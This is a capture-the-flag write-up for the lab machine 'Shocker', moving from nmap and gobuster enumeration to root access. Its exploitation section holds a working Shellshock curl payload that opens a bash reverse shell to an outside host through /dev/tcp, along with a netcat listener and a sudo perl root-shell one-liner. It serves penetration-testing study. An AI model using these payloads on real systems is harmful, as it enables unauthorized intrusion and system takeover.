Shocker Writeup

Without Metasploit

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.56

Detailed Nmap Scan :

Command Breakdown:

(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 80, 2222
(-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 80,2222 -oN nmap 10.10.10.56

Enumeration

Lets visit the website

It is just few words and an image and there is nothing of interest in the source code, so lets use Gobuster to find hidden directories on the webserver.

goubster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56

We only got one directory and we did not have access to it. Well now after thinking for a while, I thought about why the name of the machine is "Shocker", and there was only port for us to enumerate and that is port 80 , a webserver, so I went to google and searched something along of the lines of "Shocker website vulnerabilities" and then I found that there is a vulnerability that "Shellshock" can exploit. Further research told me that this vulnerability affect web servers that used CGI (Command Gateway Interface), a system utilized for generating dynamic web content. When thinking of CGI, we usually see directories like /cgi-bin and /cgi-sys, so I searched up different directories like that.

And it was a not found error, then I was looking at the next tab and thought why don't I add a backslash at the end of the URL and see what it does. To my surprise, it gave me 403 Forbidden Error, which means that the directory is present but we are not allowed to access it. Now I was curios as to if I could add / to every directory I was searching for with Gobuster and would that give me different results like this experiment did. (-f) for adding "/" at the end of every directory search.

We were not allowed to access "icons" , so lets try searching for directories or files in /cgi-bin/ with some common extensions. (-x) for specifying extensions

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -f -x php,html,txt,sh

Looks like we found a file, lets go check what it contains.

When visiting the page, we are given the option of downloading the file.

Exploitation

Now we do not have any other information except this bash script and it also has "Content-Type: text/plain" which is interesting , and what is the number one tool for Web exploitation? Burp Suite, so lets try checking it out on Burp Suite, I capturing the request to the script and sent it Repeater.

Now we know from our Enumeration that this is vulnerable to Shellshock so I went to google and searched it up when I found an article showing us how we could send a reverse shell to the webserver and get a shell on our machine, so I tried that.

We have to use a tool called "curl" , a tool that is used to send web requests to a webserver using our terminal.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh

And also start a Netcat listener

nc -lvnp 1234

And when you hit enter on the command, you get a reverse shell, but as a low privilege user

Privilege Escalation

Lets run "sudo -l" to see what we can run as root.

Looks like we can run /usr/bin/perl as root without a password, so now lets go to GTFOBins and find the command to let us privilege escalate to root. And the command is

sudo perl -e 'exec "/bin/sh";'

And we are root!

PreviousBeep Writeup NextLame Writeup

Last updated 3 years ago